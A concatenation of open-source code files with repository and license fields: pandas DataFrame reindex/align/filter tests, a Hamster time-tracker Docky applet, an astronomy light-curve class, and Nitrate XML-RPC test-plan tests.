assert_frame_equal(result, expected)
def test_reindex_api_equivalence(self):
# https://github.com/pandas-dev/pandas/issues/12392
# equivalence of the labels/axis and index/columns API's
df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
index=['a', 'b', 'c'],
columns=['d', 'e', 'f'])
res1 = df.reindex(['b', 'a'])
res2 = df.reindex(index=['b', 'a'])
res3 = df.reindex(labels=['b', 'a'])
res4 = df.reindex(labels=['b', 'a'], axis=0)
res5 = df.reindex(['b', 'a'], axis=0)
for res in [res2, res3, res4, res5]:
tm.assert_frame_equal(res1, res)
res1 = df.reindex(columns=['e', 'd'])
res2 = df.reindex(['e', 'd'], axis=1)
res3 = df.reindex(labels=['e', 'd'], axis=1)
for res in [res2, res3]:
tm.assert_frame_equal(res1, res)
with tm.assert_produces_warning(FutureWarning) as m:
res1 = df.reindex(['b', 'a'], ['e', 'd'])
assert 'reindex' in str(m[0].message)
res2 = df.reindex(columns=['e', 'd'], index=['b', 'a'])
res3 = df.reindex(labels=['b', 'a'], axis=0).reindex(labels=['e', 'd'],
axis=1)
for res in [res2, res3]:
tm.assert_frame_equal(res1, res)
def test_align(self):
af, bf = self.frame.align(self.frame)
assert af._data is not self.frame._data
af, bf = self.frame.align(self.frame, copy=False)
assert af._data is self.frame._data
# axis = 0
other = self.frame.iloc[:-5, :3]
af, bf = self.frame.align(other, axis=0, fill_value=-1)
tm.assert_index_equal(bf.columns, other.columns)
# test fill value
join_idx = self.frame.index.join(other.index)
diff_a = self.frame.index.difference(join_idx)
diff_b = other.index.difference(join_idx)
diff_a_vals = af.reindex(diff_a).values
diff_b_vals = bf.reindex(diff_b).values
assert (diff_a_vals == -1).all()
af, bf = self.frame.align(other, join='right', axis=0)
tm.assert_index_equal(bf.columns, other.columns)
tm.assert_index_equal(bf.index, other.index)
tm.assert_index_equal(af.index, other.index)
# axis = 1
other = self.frame.iloc[:-5, :3].copy()
af, bf = self.frame.align(other, axis=1)
tm.assert_index_equal(bf.columns, self.frame.columns)
tm.assert_index_equal(bf.index, other.index)
# test fill value
join_idx = self.frame.index.join(other.index)
diff_a = self.frame.index.difference(join_idx)
diff_b = other.index.difference(join_idx)
diff_a_vals = af.reindex(diff_a).values
# TODO(wesm): unused?
diff_b_vals = bf.reindex(diff_b).values # noqa
assert (diff_a_vals == -1).all()
af, bf = self.frame.align(other, join='inner', axis=1)
tm.assert_index_equal(bf.columns, other.columns)
af, bf = self.frame.align(other, join='inner', axis=1, method='pad')
tm.assert_index_equal(bf.columns, other.columns)
# test other non-float types
af, bf = self.intframe.align(other, join='inner', axis=1, method='pad')
tm.assert_index_equal(bf.columns, other.columns)
af, bf = self.mixed_frame.align(self.mixed_frame,
join='inner', axis=1, method='pad')
tm.assert_index_equal(bf.columns, self.mixed_frame.columns)
af, bf = self.frame.align(other.iloc[:, 0], join='inner', axis=1,
method=None, fill_value=None)
tm.assert_index_equal(bf.index, Index([]))
af, bf = self.frame.align(other.iloc[:, 0], join='inner', axis=1,
method=None, fill_value=0)
tm.assert_index_equal(bf.index, Index([]))
# mixed floats/ints
af, bf = self.mixed_float.align(other.iloc[:, 0], join='inner', axis=1,
method=None, fill_value=0)
tm.assert_index_equal(bf.index, Index([]))
af, bf = self.mixed_int.align(other.iloc[:, 0], join='inner', axis=1,
method=None, fill_value=0)
tm.assert_index_equal(bf.index, Index([]))
# Try to align DataFrame to Series along bad axis
with pytest.raises(ValueError):
self.frame.align(af.iloc[0, :3], join='inner', axis=2)
# align dataframe to series with broadcast or not
idx = self.frame.index
s = Series(range(len(idx)), index=idx)
left, right = self.frame.align(s, axis=0)
tm.assert_index_equal(left.index, self.frame.index)
tm.assert_index_equal(right.index, self.frame.index)
assert isinstance(right, Series)
left, right = self.frame.align(s, broadcast_axis=1)
tm.assert_index_equal(left.index, self.frame.index)
expected = {c: s for c in self.frame.columns}
expected = DataFrame(expected, index=self.frame.index,
columns=self.frame.columns)
tm.assert_frame_equal(right, expected)
# see gh-9558
df = DataFrame({'a': [1, 2, 3], 'b': [4, 5, 6]})
result = df[df['a'] == 2]
expected = DataFrame([[2, 5]], index=[1], columns=['a', 'b'])
tm.assert_frame_equal(result, expected)
result = df.where(df['a'] == 2, 0)
expected = DataFrame({'a': [0, 2, 0], 'b': [0, 5, 0]})
tm.assert_frame_equal(result, expected)
def _check_align(self, a, b, axis, fill_axis, how, method, limit=None):
aa, ab = a.align(b, axis=axis, join=how, method=method, limit=limit,
fill_axis=fill_axis)
join_index, join_columns = None, None
ea, eb = a, b
if axis is None or axis == 0:
join_index = a.index.join(b.index, how=how)
ea = ea.reindex(index=join_index)
eb = eb.reindex(index=join_index)
if axis is None or axis == 1:
join_columns = a.columns.join(b.columns, how=how)
ea = ea.reindex(columns=join_columns)
eb = eb.reindex(columns=join_columns)
ea = ea.fillna(axis=fill_axis, method=method, limit=limit)
eb = eb.fillna(axis=fill_axis, method=method, limit=limit)
assert_frame_equal(aa, ea)
assert_frame_equal(ab, eb)
@pytest.mark.parametrize('meth', ['pad', 'bfill'])
@pytest.mark.parametrize('ax', [0, 1, None])
@pytest.mark.parametrize('fax', [0, 1])
@pytest.mark.parametrize('how', ['inner', 'outer', 'left', 'right'])
def test_align_fill_method(self, how, meth, ax, fax):
self._check_align_fill(how, meth, ax, fax)
def _check_align_fill(self, kind, meth, ax, fax):
left = self.frame.iloc[0:4, :10]
right = self.frame.iloc[2:, 6:]
empty = self.frame.iloc[:0, :0]
self._check_align(left, right, axis=ax, fill_axis=fax,
how=kind, method=meth)
self._check_align(left, right, axis=ax, fill_axis=fax,
how=kind, method=meth, limit=1)
# empty left
self._check_align(empty, right, axis=ax, fill_axis=fax,
how=kind, method=meth)
self._check_align(empty, right, axis=ax, fill_axis=fax,
how=kind, method=meth, limit=1)
# empty right
self._check_align(left, empty, axis=ax, fill_axis=fax,
how=kind, method=meth)
self._check_align(left, empty, axis=ax, fill_axis=fax,
how=kind, method=meth, limit=1)
# both empty
self._check_align(empty, empty, axis=ax, fill_axis=fax,
how=kind, method=meth)
self._check_align(empty, empty, axis=ax, fill_axis=fax,
how=kind, method=meth, limit=1)
def test_align_int_fill_bug(self):
# GH #910
X = np.arange(10 * 10, dtype='float64').reshape(10, 10)
Y = np.ones((10, 1), dtype=int)
df1 = DataFrame(X)
df1['0.X'] = Y.squeeze()
df2 = df1.astype(float)
result = df1 - df1.mean()
expected = df2 - df2.mean()
assert_frame_equal(result, expected)
def test_align_multiindex(self):
# GH 10665
# same test cases as test_align_multiindex in test_series.py
midx = pd.MultiIndex.from_product([range(2), range(3), range(2)],
names=('a', 'b', 'c'))
idx = pd.Index(range(2), name='b')
df1 = pd.DataFrame(np.arange(12, dtype='int64'), index=midx)
df2 = pd.DataFrame(np.arange(2, dtype='int64'), index=idx)
# these must be the same results (but flipped)
res1l, res1r = df1.align(df2, join='left')
res2l, res2r = df2.align(df1, join='right')
expl = df1
assert_frame_equal(expl, res1l)
assert_frame_equal(expl, res2r)
expr = pd.DataFrame([0, 0, 1, 1, np.nan, np.nan] * 2, index=midx)
assert_frame_equal(expr, res1r)
assert_frame_equal(expr, res2l)
res1l, res1r = df1.align(df2, join='right')
res2l, res2r = df2.align(df1, join='left')
exp_idx = pd.MultiIndex.from_product([range(2), range(2), range(2)],
names=('a', 'b', 'c'))
expl = pd.DataFrame([0, 1, 2, 3, 6, 7, 8, 9], index=exp_idx)
assert_frame_equal(expl, res1l)
assert_frame_equal(expl, res2r)
expr = pd.DataFrame([0, 0, 1, 1] * 2, index=exp_idx)
assert_frame_equal(expr, res1r)
assert_frame_equal(expr, res2l)
def test_align_series_combinations(self):
df = pd.DataFrame({'a': [1, 3, 5],
'b': [1, 3, 5]}, index=list('ACE'))
s = pd.Series([1, 2, 4], index=list('ABD'), name='x')
# frame + series
res1, res2 = df.align(s, axis=0)
exp1 = pd.DataFrame({'a': [1, np.nan, 3, np.nan, 5],
'b': [1, np.nan, 3, np.nan, 5]},
index=list('ABCDE'))
exp2 = pd.Series([1, 2, np.nan, 4, np.nan],
index=list('ABCDE'), name='x')
tm.assert_frame_equal(res1, exp1)
tm.assert_series_equal(res2, exp2)
# series + frame
res1, res2 = s.align(df)
tm.assert_series_equal(res1, exp2)
tm.assert_frame_equal(res2, exp1)
def test_filter(self):
# Items
filtered = self.frame.filter(['A', 'B', 'E'])
assert len(filtered.columns) == 2
assert 'E' not in filtered
filtered = self.frame.filter(['A', 'B', 'E'], axis='columns')
assert len(filtered.columns) == 2
assert 'E' not in filtered
# Other axis
idx = self.frame.index[0:4]
filtered = self.frame.filter(idx, axis='index')
expected = self.frame.reindex(index=idx)
tm.assert_frame_equal(filtered, expected)
# like
fcopy = self.frame.copy()
fcopy['AA'] = 1
filtered = fcopy.filter(like='A')
assert len(filtered.columns) == 2
assert 'AA' in filtered
# like with ints in column names
df = DataFrame(0., index=[0, 1, 2], columns=[0, 1, '_A', '_B'])
filtered = df.filter(like='_')
assert len(filtered.columns) == 2
# regex with ints in column names
# from PR #10384
df = DataFrame(0., index=[0, 1, 2], columns=['A1', 1, 'B', 2, 'C'])
expected = DataFrame(
0., index=[0, 1, 2], columns=pd.Index([1, 2], dtype=object))
filtered = df.filter(regex='^[0-9]+$')
tm.assert_frame_equal(filtered, expected)
expected = DataFrame(0., index=[0, 1, 2], columns=[0, '0', 1, '1'])
# shouldn't remove anything
filtered = expected.filter(regex='^[0-9]+$')
tm.assert_frame_equal(filtered, expected)
# pass in None
with pytest.raises(TypeError, match='Must pass'):
self.frame.filter()
with pytest.raises(TypeError, match='Must pass'):
self.frame.filter(items=None)
with pytest.raises(TypeError, match='Must pass'):
self.frame.filter(axis=1)
# test mutually exclusive arguments
with pytest.raises(TypeError, match='mutually exclusive'):
self.frame.filter(items=['one', 'three'], regex='e$', like='bbi')
with pytest.raises(TypeError, match='mutually exclusive'):
self.frame.filter(items=['one', 'three'], regex='e$', axis=1)
with pytest.raises(TypeError, match='mutually exclusive'):
self.frame.filter(items=['one', 'three'], regex='e$')
with pytest.raises(TypeError, match='mutually exclusive'):
self.frame.filter(items=['one', 'three'], like='bbi', axis=0)
with pytest.raises(TypeError, match='mutually exclusive'):
self.frame.filter(items=['one', 'three'], like='bbi')
# objects
filtered = self.mixed_frame.filter(like='foo')
assert 'foo' in filtered
# unicode columns, won't ascii-encode
df = self.frame.rename(columns={'B': u('\u2202')})
filtered = df.filter(like='C')
assert 'C' in filtered
def test_filter_regex_search(self):
fcopy = self.frame.copy()
fcopy['AA'] = 1
# regex
filtered = fcopy.filter(regex='[A]+')
assert len(filtered.columns) == 2
assert 'AA' in filtered
# doesn't have to be at beginning
df = DataFrame({'aBBa': [1, 2],
'BBaBB': [1, 2],
'aCCa': [1, 2],
'aCCaBB': [1, 2]})
result = df.filter(regex='BB')
exp = df[[x for x in df.columns if 'BB' in x]]
assert_frame_equal(result, exp)
@pytest.mark.parametrize('name,expected', [
('a', DataFrame({u'a': [1, 2]})),
(u'a', DataFrame({u'a': [1, 2]})),
(u'あ', DataFrame({u'あ': [3, 4]}))
])
def test_filter_unicode(self, name, expected):
# GH13101
df = DataFrame({u'a': [1, 2], u'あ': [3, 4]})
assert_frame_equal(df.filter(like=name), expected)
assert_frame_equal(df.filter(regex=name), expected)
@pytest.mark.parametrize('name', ['a', u'a'])
def test_filter_bytestring(self, name):
# GH13101
df = DataFrame({b'a': [1, 2], b'b': [3, 4]})
expected = DataFrame({b'a': [1, 2]})
assert_frame_equal(df.filter(like=name), expected)
assert_frame_equal(df.filter(regex=name), expected)
def test_filter_corner(self):
empty = DataFrame()
result = empty.filter([])
assert_frame_equal(result, empty)
result = empty.filter(like='foo')
assert_frame_equal(result, empty)
def test_select(self):
# deprecated: gh-12410
f = lambda x: x.weekday() == 2
index = self.tsframe.index[[f(x) for x in self.tsframe.index]]
expected_weekdays = self.tsframe.reindex(index=index)
with tm.assert_produces_warning(FutureWarning,
check_stacklevel=False):
result = self.tsframe.select(f, axis=0)
assert_frame_equal(result, expected_weekdays)
result = self.frame.select(lambda x: x in ('B', 'D'), axis=1)
expected = self.frame.reindex(columns=['B', 'D'])
assert_frame_equal(result, expected, check_names=False)
# replacement
f = lambda x: x.weekday == 2
result = self.tsframe.loc(axis=0)[f(self.tsframe.index)]
assert_frame_equal(result, expected_weekdays)
crit = lambda x: x in ['B', 'D']
result = self.frame.loc(axis=1)[(self.frame.columns.map(crit))]
expected = self.frame.reindex(columns=['B', 'D'])
assert_frame_equal(result, expected, check_names=False)
# doc example
df = DataFrame({'A': [1, 2, 3]}, index=['foo', 'bar', 'baz'])
crit = lambda x: x in ['bar', 'baz']
with tm.assert_produces_warning(FutureWarning):
expected = df.select(crit)
result = df.loc[df.index.map(crit)]
assert_frame_equal(result, expected, check_names=False)
def test_take(self):
# homogeneous
order = [3, 1, 2, 0]
for df in [self.frame]:
result = df.take(order, axis=0)
expected = df.reindex(df.index.take(order))
assert_frame_equal(result, expected)
# axis = 1
result = df.take(order, axis=1)
expected = df.loc[:, ['D', 'B', 'C', 'A']]
assert_frame_equal(result, expected, check_names=False)
# negative indices
order = [2, 1, -1]
for df in [self.frame]:
result = df.take(order, axis=0)
expected = df.reindex(df.index.take(order))
assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning):
result = df.take(order, convert=True, axis=0)
assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning):
result = df.take(order, convert=False, axis=0)
assert_frame_equal(result, expected)
# axis = 1
result = df.take(order, axis=1)
expected = df.loc[:, ['C', 'B', 'D']]
assert_frame_equal(result, expected, check_names=False)
# illegal indices
pytest.raises(IndexError, df.take, [3, 1, 2, 30], axis=0)
pytest.raises(IndexError, df.take, [3, 1, 2, -31], axis=0)
pytest.raises(IndexError, df.take, [3, 1, 2, 5], axis=1)
pytest.raises(IndexError, df.take, [3, 1, 2, -5], axis=1)
# mixed-dtype
order = [4, 1, 2, 0, 3]
for df in [self.mixed_frame]:
result = df.take(order, axis=0)
expected = df.reindex(df.index.take(order))
assert_frame_equal(result, expected)
# axis = 1
result = df.take(order, axis=1)
expected = df.loc[:, ['foo', 'B', 'C', 'A', 'D']]
assert_frame_equal(result, expected)
# negative indices
order = [4, 1, -2]
for df in [self.mixed_frame]:
result = df.take(order, axis=0)
expected = df.reindex(df.index.take(order))
assert_frame_equal(result, expected)
# axis = 1
result = df.take(order, axis=1)
expected = df.loc[:, ['foo', 'B', 'D']]
assert_frame_equal(result, expected)
# by dtype
order = [1, 2, 0, 3]
for df in [self.mixed_float, self.mixed_int]:
result = df.take(order, axis=0)
expected = df.reindex(df.index.take(order))
assert_frame_equal(result, expected)
# axis = 1
result = df.take(order, axis=1)
expected = df.loc[:, ['B', 'C', 'A', 'D']]
assert_frame_equal(result, expected)
def test_reindex_boolean(self):
frame = DataFrame(np.ones((10, 2), dtype=bool),
index=np.arange(0, 20, 2),
columns=[0, 2])
reindexed = frame.reindex(np.arange(10))
assert reindexed.values.dtype == np.object_
assert isna(reindexed[0][1])
reindexed = frame.reindex(columns=lrange(3))
assert reindexed.values.dtype == np.object_
assert isna(reindexed[1]).all()
def test_reindex_objects(self):
reindexed = self.mixed_frame.reindex(columns=['foo', 'A', 'B'])
assert 'foo' in reindexed
reindexed = self.mixed_frame.reindex(columns=['A', 'B'])
assert 'foo' not in reindexed
def test_reindex_corner(self):
index = Index(['a', 'b', 'c'])
dm = self.empty.reindex(index=[1, 2, 3])
reindexed = dm.reindex(columns=index)
tm.assert_index_equal(reindexed.columns, index)
# ints are weird
smaller = self.intframe.reindex(columns=['A', 'B', 'E'])
assert smaller['E'].dtype == np.float64
def test_reindex_axis(self):
cols = ['A', 'B', 'E']
with tm.assert_produces_warning(FutureWarning) as m:
reindexed1 = self.intframe.reindex_axis(cols, axis=1)
assert 'reindex' in str(m[0].message)
reindexed2 = self.intframe.reindex(columns=cols)
assert_frame_equal(reindexed1, reindexed2)
rows = self.intframe.index[0:5]
with tm.assert_produces_warning(FutureWarning) as m:
reindexed1 = self.intframe.reindex_axis(rows, axis=0)
assert 'reindex' in str(m[0].message)
reindexed2 = self.intframe.reindex(index=rows)
assert_frame_equal(reindexed1, reindexed2)
pytest.raises(ValueError, self.intframe.reindex_axis, rows, axis=2)
# no-op case
cols = self.frame.columns.copy()
with tm.assert_produces_warning(FutureWarning) as m:
newFrame = self.frame.reindex_axis(cols, axis=1)
assert 'reindex' in str(m[0].message)
assert_frame_equal(newFrame, self.frame)
def test_reindex_with_nans(self):
df = DataFrame([[1, 2], [3, 4], [np.nan, np.nan], [7, 8], [9, 10]],
columns=['a', 'b'],
index=[100.0, 101.0, np.nan, 102.0, 103.0])
result = df.reindex(index=[101.0, 102.0, 103.0])
expected = df.iloc[[1, 3, 4]]
assert_frame_equal(result, expected)
result = df.reindex(index=[103.0])
expected = df.iloc[[4]]
assert_frame_equal(result, expected)
result = df.reindex(index=[101.0])
expected = df.iloc[[1]]
assert_frame_equal(result, expected)
def test_reindex_multi(self):
df = DataFrame(np.random.randn(3, 3))
result = df.reindex(index=lrange(4), columns=lrange(4))
expected = df.reindex(lrange(4)).reindex(columns=lrange(4))
assert_frame_equal(result, expected)
df = DataFrame(np.random.randint(0, 10, (3, 3)))
result = df.reindex(index=lrange(4), columns=lrange(4))
expected = df.reindex(lrange(4)).reindex(columns=lrange(4))
assert_frame_equal(result, expected)
df = DataFrame(np.random.randint(0, 10, (3, 3)))
result = df.reindex(index=lrange(2), columns=lrange(2))
expected = df.reindex(lrange(2)).reindex(columns=lrange(2))
assert_frame_equal(result, expected)
df = DataFrame(np.random.randn(5, 3) + 1j, columns=['a', 'b', 'c'])
result = df.reindex(index=[0, 1], columns=['a', 'b'])
expected = df.reindex([0, 1]).reindex(columns=['a', 'b'])
assert_frame_equal(result, expected)
def test_reindex_multi_categorical_time(self):
# https://github.com/pandas-dev/pandas/issues/21390
midx = pd.MultiIndex.from_product(
[Categorical(['a', 'b', 'c']),
Categorical(date_range("2012-01-01", periods=3, freq='H'))])
df = pd.DataFrame({'a': range(len(midx))}, index=midx)
df2 = df.iloc[[0, 1, 2, 3, 4, 5, 6, 8]]
result = df2.reindex(midx)
expected = pd.DataFrame(
{'a': [0, 1, 2, 3, 4, 5, 6, np.nan, 8]}, index=midx)
assert_frame_equal(result, expected)
data = [[1, 2, 3], [1, 2, 3]]
@pytest.mark.parametrize('actual', [
DataFrame(data=data, index=['a', 'a']),
DataFrame(data=data, index=['a', 'b']),
DataFrame(data=data, index=['a', 'b']).set_index([0, 1]),
DataFrame(data=data, index=['a', 'a']).set_index([0, 1])
])
def test_raise_on_drop_duplicate_index(self, actual):
# issue 19186
level = 0 if isinstance(actual.index, MultiIndex) else None
with pytest.raises(KeyError):
actual.drop('c', level=level, axis=0)
with pytest.raises(KeyError):
actual.T.drop('c', level=level, axis=1)
expected_no_err = actual.drop('c', axis=0, level=level,
errors='ignore')
assert_frame_equal(expected_no_err, actual)
expected_no_err = actual.T.drop('c', axis=1, level=level,
errors='ignore')
assert_frame_equal(expected_no_err.T, actual)
@pytest.mark.parametrize('index', [[1, 2, 3], [1, 1, 2]])
@pytest.mark.parametrize('drop_labels', [[], [1], [2]])
def test_drop_empty_list(self, index, drop_labels):
# GH 21494
expected_index = [i for i in index if i not in drop_labels]
frame = pd.DataFrame(index=index).drop(drop_labels)
tm.assert_frame_equal(frame, pd.DataFrame(index=expected_index))
@pytest.mark.parametrize('index', [[1, 2, 3], [1, 2, 2]])
@pytest.mark.parametrize('drop_labels', [[1, 4], [4, 5]])
def test_drop_non_empty_list(self, index, drop_labels):
# GH 21494
with pytest.raises(KeyError, match='not found in axis'):
pd.DataFrame(index=index).drop(drop_labels)
| bsd-3-clause |
d/hamster-applet | src/docky_control/2.0/hamster_control.py | 1 | 3556 | #!/usr/bin/env python
#
# Copyright (C) 2010 Toms Baugis
#
# Original code from Banshee control,
# Copyright (C) 2009-2010 Jason Smith, Rico Tzschichholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import atexit
import gobject
import sys, os
from subprocess import Popen
import gtk
from docky.docky import DockyItem, DockySink
from signal import signal, SIGTERM
from sys import exit
from hamster import client
from hamster.utils import stuff, i18n
i18n.setup_i18n()
class DockyHamsterItem(DockyItem):
def __init__(self, path):
DockyItem.__init__(self, path)
self.storage = client.Storage()
self.storage.connect("facts-changed", lambda storage: self.refresh_hamster())
self.storage.connect("activities-changed", lambda storage: self.refresh_hamster())
self.id_map = {} #menu items
self.update_text()
self.add_actions()
gobject.timeout_add_seconds(60, self.refresh_hamster)
def refresh_hamster(self):
try:
self.update_text()
finally: # we want to go on no matter what, so in case of any error we find out about it sooner
return True
def update_text(self):
today = self.storage.get_todays_facts()
if today and today[-1].end_time is None:
fact = today[-1]
self.iface.SetText("%s - %s" % (fact.activity, fact.category))
self.iface.SetBadgeText(stuff.format_duration(fact.delta, human=False))
else:
self.iface.SetText(_("No activity"))
self.iface.ResetBadgeText()
def add_menu_item(self, name, icon):
menu_id = self.iface.AddMenuItem(name, icon, "")
self.id_map[menu_id] = name
def menu_pressed(self, menu_id):
if self.id_map[menu_id] == _("Overview"):
Popen(["hamster-time-tracker", "overview"])
elif self.id_map[menu_id] == _("Preferences"):
Popen(["hamster-time-tracker", "preferences"])
self.add_actions() # TODO - figure out why is it that we have to regen all menu items after each click
def add_actions(self):
# first clear the menu
for k, v in self.id_map.iteritems():
self.iface.RemoveItem(k)
self.id_map = {}
# now add buttons
self.add_menu_item(_("Overview"), "")
self.add_menu_item(_("Preferences"), "preferences-desktop-personal")
class DockyHamsterSink(DockySink):
def item_path_found(self, pathtoitem, item):
if item.GetOwnsDesktopFile() and item.GetDesktopFile().endswith("hamster-time-tracker.desktop"):
self.items[pathtoitem] = DockyHamsterItem(pathtoitem)
dockysink = DockyHamsterSink()
def cleanup():
dockysink.dispose()
if __name__ == "__main__":
mainloop = gobject.MainLoop(is_running=True)
atexit.register (cleanup)
signal(SIGTERM, lambda signum, stack_frame: exit(1))
while mainloop.is_running():
mainloop.run()
| gpl-3.0 |
uperetz/AstroTools | lc.py | 1 | 3601 | #Object for handling numerical functions
from plotInt import Iplot
from re import split
class lightCurve:
x = 0
y = 1
dy = 2
class lcOutOfBound(Exception): pass
def __init__(self,table = []):
self.table = []
try:
for line in open(table):
try:
self.table.append([float(x) for x in
split("\s+",line.strip())])
except TypeError: continue
except TypeError: self.table = table
self.table.sort()
'Currently only 3-point derivative.'
def diff(self,i):
if i <= 0 or i >= len(self.table)-1: return None
dy = self.table[i+1][1] - self.table[i-1][1]
dx = self.table[i+1][0] - self.table[i-1][0]
return self.table[i][0],dy/dx
def avg(self,column, transform = lambda x: x):
return sum([transform(row[column]) for row in self.table])/len(self.table)
def var(self, column):
return self.avg(column,lambda x: x**2)-self.avg(column)**2
def resetzoom(self):
try: self.table = self.original
except KeyError: pass
def slideAndAverage(self, windowSize, action, verbose=False):
if action in dir(self):
start = -1
res = 0
count = 0
try:
while True:
start += 1
stop = self.find(self.table[start][0]+windowSize)
self.zoom(window=[start,stop])
current = getattr(self,action)()
self.resetzoom()
if verbose:
print("-I- Window [",start,"=",self.table[start][0],"-",stop,"=",self.table[stop][0],"] got",action,"of",current)
res += current
count += 1
except lightCurve.lcOutOfBound: pass
if verbose:
print("-I- Got",count,"windows.")
return res/count
else:
print("-E- Got bad action! use dir() to see availble actions (no parameter functions).")
def inPairs(self, column, action=lambda x,y: abs(x-y), after=lambda x: sum(x)/(len(x)-1)):
return after([action(self.table[i][column],self.table[i-1][column])
for i in range(1,len(self.table))])
def zoom(self, timewindow=None, window=[]):
if timewindow:
window.append(self.find(timewindow[0]))
window.append(self.find(timewindow[1]))
if window[1] < 0:
window[1] += len(self.table)
window[1] += 1
self.original = self.table
self.table = self.table[window[0]:window[1]]
def Fvar(self):
return ((self.var(self.y) - self.avg(self.dy,lambda x: x**2))/
self.avg(self.y)**2)**0.5
#Earliest time smaller or equal to time
def find(self, time):
if time > self.table[-1][0] or time < self.table[0][0]:
raise lightCurve.lcOutOfBound()
for i in range(0,len(self.table)):
if self.table[i][0] > time: return i
def dFvar(self):
N = len(self.table)
s2 = self.avg(self.dy,lambda x: x**2)
F = (self.avg(self.y))
return ( (((s2/N)**0.5)/F)**2 + ((s2/F**2/self.Fvar())*(1/(2*N))**0.5)**2 )**0.5
def plot(self):
Iplot.clearPlots()
Iplot.plotCurves(self)
def __getitem__(self,i):
return self.table[i]
def __iadd__(self,other):
self.table += other.table
return self
def __len__(self):
return len(self.table)
| apache-2.0 |
tkdchen/Nitrate | src/tests/xmlrpc/test_testplan.py | 2 | 18477 | # -*- coding: utf-8 -*-
import unittest
from django import test
from tcms.testcases.models import TestCase
from tcms.testcases.models import TestCasePlan
from tcms.testplans.models import TCMSEnvPlanMap, TestPlan, TestPlanType
from tcms.xmlrpc.api import testplan as XmlrpcTestPlan
from tcms.xmlrpc.api.testplan import import_case_via_XML
from tcms.xmlrpc.serializer import datetime_to_str
from tests import factories as f
from tests.testplans.test_importer import xml_file_without_error
from tests.xmlrpc.utils import make_http_request
from tests.xmlrpc.utils import XmlrpcAPIBaseTest
__all__ = (
"TestAddComponent",
"TestAddTag",
"TestComponentMethods",
"TestFilter",
"TestGetAllCasesTags",
"TestGetProduct",
"TestGetTestCases",
"TestGetTestRuns",
"TestGetText",
"TestImportCaseViaXML",
"TestPlanTypeMethods",
"TestRemoveTag",
"TestUpdate",
)
class TestFilter(XmlrpcAPIBaseTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.product = f.ProductFactory()
cls.version = f.VersionFactory(product=cls.product)
cls.tester = f.UserFactory()
cls.plan_type = f.TestPlanTypeFactory(name="manual smoking")
cls.plan_1 = f.TestPlanFactory(
product_version=cls.version,
product=cls.product,
author=cls.tester,
type=cls.plan_type,
)
cls.plan_2 = f.TestPlanFactory(
product_version=cls.version,
product=cls.product,
author=cls.tester,
type=cls.plan_type,
)
cls.case_1 = f.TestCaseFactory(
author=cls.tester,
default_tester=None,
reviewer=cls.tester,
plan=[cls.plan_1],
)
cls.case_2 = f.TestCaseFactory(
author=cls.tester,
default_tester=None,
reviewer=cls.tester,
plan=[cls.plan_1],
)
def test_filter_plans(self):
plans = XmlrpcTestPlan.filter(self.request, {"pk__in": [self.plan_1.pk, self.plan_2.pk]})
plan = plans[0]
self.assertEqual(self.plan_1.name, plan["name"])
self.assertEqual(self.plan_1.product_version.pk, plan["product_version_id"])
self.assertEqual(self.plan_1.author.pk, plan["author_id"])
self.assertEqual(2, len(plan["case"]))
self.assertEqual([self.case_1.pk, self.case_2.pk], plan["case"])
self.assertEqual(0, len(plans[1]["case"]))
def test_filter_out_all_plans(self):
plans_total = TestPlan.objects.all().count()
self.assertEqual(plans_total, len(XmlrpcTestPlan.filter(None)))
self.assertEqual(plans_total, len(XmlrpcTestPlan.filter(None, {})))
class TestAddTag(XmlrpcAPIBaseTest):
@classmethod
def setUpTestData(cls):
cls.user = f.UserFactory()
cls.http_req = make_http_request(user=cls.user, user_perm="testplans.add_testplantag")
cls.product = f.ProductFactory()
cls.plans = [
f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
]
cls.tag1 = f.TestTagFactory(name="xmlrpc_test_tag_1")
cls.tag2 = f.TestTagFactory(name="xmlrpc_test_tag_2")
cls.tag_name = "xmlrpc_tag_name_1"
def test_single_id(self):
"""Test with singal plan id and tag id"""
self.assertXmlrpcFaultInternalServerError(
XmlrpcTestPlan.add_tag, self.http_req, self.plans[0].pk, self.tag1.pk
)
XmlrpcTestPlan.add_tag(self.http_req, self.plans[0].pk, self.tag1.name)
tag_exists = TestPlan.objects.filter(pk=self.plans[0].pk, tag__pk=self.tag1.pk).exists()
self.assertTrue(tag_exists)
def test_array_argument(self):
XmlrpcTestPlan.add_tag(self.http_req, self.plans[0].pk, [self.tag2.name, self.tag_name])
tag_exists = TestPlan.objects.filter(
pk=self.plans[0].pk, tag__name__in=[self.tag2.name, self.tag_name]
)
self.assertTrue(tag_exists.exists())
plans_ids = [plan.pk for plan in self.plans]
tags_names = [self.tag_name, "xmlrpc_tag_name_2"]
XmlrpcTestPlan.add_tag(self.http_req, plans_ids, tags_names)
for plan in self.plans:
tag_exists = plan.tag.filter(name__in=tags_names).exists()
self.assertTrue(tag_exists)
class TestAddComponent(XmlrpcAPIBaseTest):
@classmethod
def setUpTestData(cls):
cls.user = f.UserFactory()
cls.http_req = make_http_request(user=cls.user, user_perm="testplans.add_testplancomponent")
cls.product = f.ProductFactory()
cls.plans = [
f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
f.TestPlanFactory(author=cls.user, owner=cls.user, product=cls.product),
]
cls.component1 = f.ComponentFactory(
name="xmlrpc test component 1",
description="xmlrpc test description",
product=cls.product,
initial_owner=None,
initial_qa_contact=None,
)
cls.component2 = f.ComponentFactory(
name="xmlrpc test component 2",
description="xmlrpc test description",
product=cls.product,
initial_owner=None,
initial_qa_contact=None,
)
def test_single_id(self):
XmlrpcTestPlan.add_component(self.http_req, self.plans[0].pk, self.component1.pk)
component_exists = TestPlan.objects.filter(
pk=self.plans[0].pk, component__pk=self.component1.pk
).exists()
self.assertTrue(component_exists)
def test_ids_in_array(self):
self.assertXmlrpcFaultBadRequest(XmlrpcTestPlan.add_component, self.http_req, [1, 2])
